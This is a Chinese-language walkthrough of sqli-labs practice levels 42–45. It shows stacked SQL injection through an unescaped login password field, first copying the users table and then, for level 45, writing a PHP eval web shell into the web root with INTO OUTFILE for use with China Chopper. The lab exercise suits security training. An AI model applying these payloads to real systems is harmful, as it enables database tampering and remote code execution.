sqli-libs（42-45（post型）关）

Less_42

查看源代码，可以看到password没有经过mysqli_real_escape_string()函数进行处理，所以这个时候我们在这个位置进行构造

使用admin 111111进行登录，登陆成功；

我们打开查看元素，将type修改为text，则密码将显示出来；

我们在名称那输入admin

密码那输入

a';create table ztt42 like users;insert into ztt42 select *from users; #

回显错误；

但我们查看后台数据库，显示表ztt42已建好，说明注入成功；

Less_43

Less43:  使用(‘’)包裹   其他操作与42关基本一致。

我们打开查看元素，将type修改为text，将密码将显示出来；

其余操作与42关基本一致。

 

 

 

 

 

Less_44/45

less-44:    使用’’包裹  其他操作与第42关基本一致。

less-45:   使用(‘’)包裹   其他操作与第42关基本一致。

  

账户输入a  密码输入a’   回显依旧错误，并且回显没有报错信息；

其他操作与第42关基本一致。

Less45使用使用堆叠注入写入一句话木马配合中国菜刀也可以进行注入

需要条件：

1.必须要有写权限

2.一句话木马（<?php @eval($_POST[crow]);?> ）

3.Select xxx into outfile xxx

4.绝对路径（C:\\phpStudy\WWW）

最终结果 密码输入：  a’)  select ‘<?php @eval($_POST[crow]);?>’ into outfile ‘C:\\phpStudy\\WWW\\a.php’;#